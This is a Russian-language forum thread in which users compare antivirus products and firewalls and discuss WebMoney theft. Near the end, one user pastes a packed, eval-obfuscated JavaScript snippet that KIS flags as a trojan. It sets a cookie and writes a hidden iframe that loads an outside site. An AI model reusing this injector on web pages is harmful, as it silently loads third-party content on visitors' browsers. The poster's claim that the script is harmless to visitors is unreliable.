Луцкая Даша
912 сообщений
#14 лет назад
Цитата ("owlteam"):
Зачем же так? Сначала лучше переколотить вирусов на флешке )))

нет, лучше палкой, чтоб больше не приносил))
Александра К.
594 сообщения
#14 лет назад
Может, проблема не в НОДе, а в Вебмани?
Просто интересно изучить статистику, кто терял деньги, пользуясь КИС, а кто - НОДом, и еть ли тут связь?
Ведь получается, что при отсутствии антивируса (неважно какого) автор потерял деньги, на момент потери у него не стояли никакие антивирусы (хотя Автор перед сносом и установкой, к сожалению, не проверил, что у него с балансом).
Я не специалист, может, кто прояснит?
Или выходит так, что. если на компьютере не стоит никакого антивируса, деньги с ВМ могут украсть в любой момент? так, что ли?
Сергей Б.
2268 сообщений
#14 лет назад
Цитата ("Alexandra-k"):
Просто интересно изучить статистику, кто терял деньги, пользуясь КИС, а кто - НОДом, и еть ли тут связь?


Я поражаюсь, о Dr.Web в этой теме всего пару слов и то - одно мое. ))))))
Однако ж я пользуюсь им уже больше 10-ти лет...
Сергей Б.
2268 сообщений
#14 лет назад
Цитата ("MadOyster"):
нет, лучше палкой, чтоб больше не приносил))


Вы что! o_O Я же про компьютерные вирусы говорю, а не... ГМ... )))))))
Александра К.
594 сообщения
#14 лет назад
Цитата ("owlteam"):
Dr.Web в этой теме всего пару слов
Это. наверное, просто привычка, удобство), это ведь хороший антивирус - неоспоримо, поэтому и молчат).
Владимир Ф.
1322 сообщения
#14 лет назад
Оффтопик
Цитата ("owlteam"):

Я поражаюсь, о Dr.Web в этой теме всего пару слов и то - одно мое. ))))))
Однако ж я пользуюсь им уже больше 10-ти лет...

Это еще гордые пользователи **ix систем ничего не писали ))
Юлия М.
199 сообщений
#14 лет назад
Цитата ("WWWolf"):
Предлагаю эксперемент!! ))) Есть один у меня файликов совсем безобидный. Не переживайте, ничего не случится, если вы его скачаете. Вот и посмотрим, что у кого скажет антивирь! Результат Каспера 2010 я уже знаю.. Так что скачивайте и проверяйте, токо будьте пожалуйста чесны в ответе.



только скачайте файлом, а не просто в браузере гляньте!


Стоит KIS. Только нажала на ссылку - выдал:
Доступ запрещен
Запрашиваемый URL-адрес не может быть предоставлен

В запрашиваемом объекте по URL-адресу:



Обнаружена угроза:

объект заражен HEUR:Trojan.Script.Iframer
Роман К.
6970 сообщений
#14 лет назад
Цитата ("Alexandra-k"):
voron_76, я поправила) - не лучше. а "хуже", опечатка).

Мой ответ можно не менять.

Цитата:
Вы сами чистите компьютер, или аккуратно/вдумчиво пользуетесь интернетом?

Да не очень и вдумчиво... И чистить особо нечего. Просто минимизировал количество дыр - вот и не лезет ничего.
Роман К.
6970 сообщений
#14 лет назад
Цитата ("Alexandra-k"):
Может, проблема не в НОДе, а в Вебмани?
Просто интересно изучить статистику, кто терял деньги, пользуясь КИС, а кто - НОДом, и еть ли тут связь?
Ведь получается, что при отсутствии антивируса (неважно какого) автор потерял деньги, на момент потери у него не стояли никакие антивирусы (хотя Автор перед сносом и установкой, к сожалению, не проверил, что у него с балансом).
Я не специалист, может, кто прояснит?
Или выходит так, что. если на компьютере не стоит никакого антивируса, деньги с ВМ могут украсть в любой момент? так, что ли?

Нет, не так.
Деньги с Вебмани воруют, скорее, не вирусами, а троянами и червями, а против них антивирусы не особо сильны (особенно против последних). Вообще, при работе в Интернете антивирус практически ни от чего не защищает - тут нужен файрвол, а им как раз многие и пренебрегают.
Сергей Б.
2268 сообщений
#14 лет назад
Оффтопик

ЕДИНСТВЕННО ВЕРНЫЙ, СТО ПРОЦЕНТНО-ДЕЙСТВУЮЩИЙ СПОСОБ ИЗБАВИТЬСЯ ОТ ВИРУСОВ РАЗ И НАВСЕГДА
(ПОШАГОВАЯ ИНСТРУКЦИЯ)

1. Купить новый компьютер
2. Сразу форматнуть винчестер
3. Выдернуть из компа все сетевые платы, а модем выбросить в форточку (чтобы не было соблазнов)..
4. После того, как позвонит друг и попросится зайти в гости погамать в новую игру, показать новую "крутую" прогу или перекачать фотки с цифрового фотика на диск, заранее вытащить из кладовки ящик с инструментами...
5. Как только друг заявится, побыстрее заполучить от него в руки флешку/диск/фотоаппарат/мобильник и...
6. Бум-бум-бум по ним молотком!!!


Роман К.
6970 сообщений
#14 лет назад
Цитата ("owlteam"):
Я поражаюсь, о Dr.Web в этой теме всего пару слов и то - одно мое. ))))))
Однако ж я пользуюсь им уже больше 10-ти лет...

Действительно, как это: owlteam - и не пропиарит свой любимый всёизлечивающий CureIt.

Что о нём говорить-то? Обычный антивирус, со своими достоинствами и недостатками. Стопроцентной гарантии как защиты, так и излечения (как и все прочие) не даёт.
Роман К.
6970 сообщений
#14 лет назад
Цитата ("k-a-j"):
Если вам кто принес флешку с вирусами, разрешаю того бить палкой .

Зачем? Может, у человека хобби такое - разводит вирей вместо тамагочи. Мне, например, нисколько не жалко, пусть носят.
Александра К.
594 сообщения
#14 лет назад
Цитата ("voron_76"):
файрвол
верно ли, что Касперский. н-р. и есть файрвол?
и второй вопрос - файрвол, н-р. аутпост и КИС (или НОД) - они уживаются вместе?
Это я просто спрашиваю), до конца чтоб понять.
Моя подруга в ОАЭ пользуется только файрволом (каким, увы, не знаю), но на вирусы она попала только один раз.
У Вас какой файрвол?
Сергей Б.
2268 сообщений
#14 лет назад
Цитата ("voron_76"):
Действительно, как это: owlteam - и не пропиарит свой любимый всёизлечивающий CureIt.
Что о нём говорить-то? Обычный антивирус, со своими достоинствами и недостатками. Стопроцентной гарантии как защиты, так и излечения (как и все прочие) не даёт.


Соглашусь только в одном - к любому продукту нужно еще и руки приложить...
Страдают в основном те, кто просто, понадеявшись на рекламные обещания разработчиков антивирусов, полностью доверился им...
А ведь это не так.

Да и с другой стороны, если подумать, почему бы и не пропиарить Доктора Вебера, если он, обладая той же примерно эффективностью, что и все остальные, работает быстрее и качественнее???
Роман К.
6970 сообщений
#14 лет назад
Цитата ("Alexandra-k"):
Цитата ("voron_76"):
файрвол
верно ли, что Касперский. н-р. и есть файрвол?

KIS - это комплекс из антивируса и файрвола. Kaspersky Antivirus - это чистый антивирус.

Цитата:
и второй вопрос - файрвол, н-р. аутпост и КИС (или НОД) - они уживаются вместе?

Аутпост и КИС, скорее всего, начнут конфликтовать. Аутпост и НОД - не знаю. По-моему, у НОДа нет функций файрвола - тогда не должны.

Цитата:
Моя подруга в ОАЭ пользуется только файрволом (каким, увы, не знаю), но на вирусы она попала только один раз.

Я давно уже об этом говорю: файрвол сейчас обязателен, антивирус - нет. Файрвол плюс заделанные дыры плюс немного знаний вполне защищают комп практически от любой заразы.

Цитата:
У Вас какой файрвол?

Outpost Free.
Роман К.
6970 сообщений
#14 лет назад
Цитата ("owlteam"):
Цитата ("voron_76"):
Действительно, как это: owlteam - и не пропиарит свой любимый всёизлечивающий CureIt.
Что о нём говорить-то? Обычный антивирус, со своими достоинствами и недостатками. Стопроцентной гарантии как защиты, так и излечения (как и все прочие) не даёт.

Соглашусь только в одном - к любому продукту нужно еще и руки приложить...

Эм... Это с чем таким Вы соглашаетесь? Я, вроде, ничего подобного в отквоченном тексте не говорил. Более того: вообще не вижу особого смысла "прикладывать руки" к Доктору Вебу - настройки по умолчанию там вполне достаточные, а стопроцентной защиты никаким прикладыванием рук от него не добиться.
Сергей Б.
2268 сообщений
#14 лет назад
Цитата ("voron_76"):
Цитата:
У Вас какой файрвол?

Outpost Free.


Названия бесполезно давать. Человек должен представлять, что делает файрвол и как, иначе он его в жизни не настроит...
Роман К.
6970 сообщений
#14 лет назад
Цитата ("owlteam"):
Цитата ("voron_76"):
Цитата:
У Вас какой файрвол?

Outpost Free.

Названия бесполезно давать. Человек должен представлять, что делает файрвол и как, иначе он его в жизни не настроит...

Кагбэ меня не спрашивали, "что делает файрвол" и как его настраивать. Спросили название - я ответил.

По большому счёту, без разницы, какой файрвол. Даже стандартного виндового из второго сервис-пака вполне достаточно.
Николай Г.
601 сообщение
#14 лет назад
Цитата ("WWWolf"):

Предлагаю эксперемент!! Есть один у меня файликов совсем безобидный. Не переживайте, ничего не случится, если вы его скачаете. Вот и посмотрим, что у кого скажет антивирь! Результат Каспера 2010 я уже знаю.. Так что скачивайте и проверяйте, токо будьте пожалуйста чесны в ответе.



только скачайте файлом, а не просто в браузере гляньте!

Ну бред... Могу рассказать что происходит.
На каком то сайте провесили iframe, который что-то делает.
если интересно, самая фишка происходит в коде
<SCRIPT LANGUAGE="Javascript">
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r=k||e(c);k=}];e=function(){return'\\w+'};c=1};while(c--)if(k)p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k);return p}('l p(8){q=B.C;c(q){r=s(\'t\');c(r==7){6 d=D E();d.F(d.G()+(H*u*u*I));e(\'t\',\'1\',d,"/");9.J("<v K=\'L://M.N.O/P/Q.R\' S=\'T:U\'></v>");V.W()}}}l s(8){6 m=8+"=";6 w=m.n;6 x=9.f.n;6 i=0;X(i<x){6 j=i+w;c(9.f.Y(i,j)==m)y Z(j);i=9.f.10(" ",i)+1;c(i==0)11}y 7}l e(8,z){6 a=e.A;6 b=e.A.n;6 g=(b>2)?a:7;6 h=(b>3)?a:7;6 k=(b>4)?a:7;6 o=(b>5)?a:12;9.f=8+"="+13(z)+((g==7)?"":("; g="+g.14()))+((h==7)?"":("; h="+h))+((k==7)?"":("; k="+k))+((o==15)?"; o":"")}9.16=p(8);',62,69,'||||||var|null|name|document|argv|argc|if|ExpDate|SetCookie|cookie|expires|path|||domain|function|arg|length|secure|PopShow3|CookieTest|ClickUndercookie|GetCookie|clickunder|60|iframe|alen|clen|return|value|arguments|navigator|cookieEnabled|new|Date|setTime|getTime|48|1000|write|src|http|www|gameswar|ru|12345|stats|html|style|display|none|window|focus|while|substring|getCookieVal|indexOf|break|false|escape|toGMTString|true|onload'.split('|'),0,{}))
</SCRIPT>

Черт его знает, разбираться лениво, что же тут происходит... Но явно JS проходится по пятку-другому сайтов, которые накручивают себе посещаемость. Плюс что-то делает с куками...
Касперский, из желания выпендриться, забил этот код к себе в базу под громким именем "TrojanIFrame" или как нибудь так... Принципиален момент что навредить это может ТОЛЬКО тому сайту, на странице которого этот код висит, и ничему больше.
NOD ту же сумму денег(времени своих работников) потратил на то, чтобы дописать еще один алгоритм поиска еще не известных вирусов.

p.s. раз уж тут заговорили о *nix'оидах... Ставьте линукс и не будет вам проблем. Под него например кипер вообще хрен настроишь, так что будете пользоваться только сайтом=>никаких проблем!
Александра К.
594 сообщения
#14 лет назад
Цитата ("owlteam"):
Названия бесполезно давать
Не бесполезно.
Я знала, что аутпост и КИС конфликтуют, поэтому и спросила, чтобы уточнить).
Почему не настроит... не сможет сам человек настроить - вызовет специалиста - даст денег. ему всё "разжуют", нет проблем.
важен принцип - что. н-р. любая антиврусная система - это не защита от кражи денег.
Хотя это не исходит из данной темы. птому что "комп заглючил", почему он заглючил?
Он поймал вирус? но ведь вирусами деньги не крадут?
Я сухой остаток хочу понять), тем более тут есть специалисты. которые хорошо в этом разбираются (voron_76).